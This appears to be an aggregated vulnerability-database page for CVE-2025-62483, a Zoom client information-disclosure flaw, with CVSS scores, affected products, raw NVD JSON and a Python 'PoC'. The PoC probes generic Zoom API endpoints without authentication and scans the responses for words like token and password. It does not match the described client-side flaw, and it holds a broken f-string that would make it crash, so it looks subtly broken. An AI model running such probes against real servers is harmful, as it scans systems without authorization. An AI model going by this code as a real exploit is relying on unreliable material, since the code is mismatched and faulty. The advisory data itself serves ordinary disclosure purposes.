Security Vulnerability Report
中文
CVE-2025-62483 CVSS 5.3 MEDIUM

CVE-2025-62483

Published: 2025-11-13 15:15:52
Last Modified: 2026-01-13 20:50:11
Source: [email protected]

Description

Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:* - VULNERABLE
Zoom Clients < 6.5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62483 PoC - Zoom Client Information Disclosure # This PoC demonstrates the information disclosure vulnerability in Zoom clients before 6.5.10 # Note: This is for educational and authorized testing purposes only import requests import json import argparse from urllib.parse import urljoin def test_zoom_info_disclosure(target_url, cve_id="CVE-2025-62483"): """ Test for CVE-2025-62483: Improper removal of sensitive information in Zoom Clients This PoC attempts to identify if the target Zoom client endpoint leaks sensitive information through network access. The vulnerability allows unauthenticated users to access sensitive data. """ print(f"[*] Testing for {cve_id}") print(f"[*] Target: {target_url}") # Common Zoom client API endpoints that might leak information endpoints = [ "/v2/users/me", "/v2/meetings", "/v2/users/me/settings", "/v2/report/meetings", "/v1/client/config", "/v1/user/info" ] results = [] for endpoint in endpoints: try: full_url = urljoin(target_url, endpoint) response = requests.get(full_url, timeout=10, verify=False) # Check if response contains sensitive information indicators sensitive_patterns = [ "token", "secret", "password", "credential", "auth", "session", "private_key", "api_key" ] response_text = response.text.lower() found_patterns = [p for p in sensitive_patterns if p in response_text] if found_patterns or response.status_code != 401: results.append({ "endpoint": endpoint, "status_code": response.status_code, "sensitive_data_leaked": found_patterns, "vulnerable": True }) print(f"[!] Potential vulnerability found at {endpoint}") print(f" Status: {response.status_code}") print(f" Leaked patterns: {found_patterns}") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") if not results: print("[*] No obvious information disclosure detected") print("[*] Manual verification recommended") return results if __name__ == "__main__": parser = argparse.ArgumentParser(description=f"PoC for {CVE-2025-62483}") parser.add_argument("-t", "--target", required=True, help="Target Zoom server URL") args = parser.parse_args() test_zoom_info_disclosure(args.target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62483", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:51.860", "lastModified": "2026-01-13T20:50:10.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper removal of sensitive information in certain Zoom Clients before version 6.5.10 may allow an unauthenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "81E0F90E-35B6-464F-9BE3-164BA24D2009"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "6E806B61-C0EF-4A0E-9B7A-F5D27D173B32"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "851C9061-1A47-4521-9FD9-9933A5A7509A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "D2D51ECB-5A89-4C78-A30E-7B454D63B24F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "8B3EA329-4800-4C0F-87AC-75C98EA4BC21"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "FFBB7286-F0EF-4F07-B5CD-EF140843D636"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "38D8F8A2-A530-4A22-99D2-1C385CDBC5F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "5129314C-E9A6-48A5-973D-4293E5362582"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms_controller:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "5766D499-72EC-47FB-9EA0-F8239E8CD971"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:linux:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "08F19DBA-97B0-4FEB-BE40-35C58E25212E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "E77D9B96-3C18-49F1-9119-30A154D6243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.10", "matchCriteriaId": "366D7D39-E1C5-48C0-8F12-F4860FA5BD44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.3.14", "matchCriteriaId": "5D61DBA7-2AFE-47E4-8A7E-3C8EE6696BF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionStartIncluding": "6.4.10", "versionEndExcluding": "6.4.12", "matchCriteriaId": "A57A2EE0-D00B-4266-B152-2439B8ED774A"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25047", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.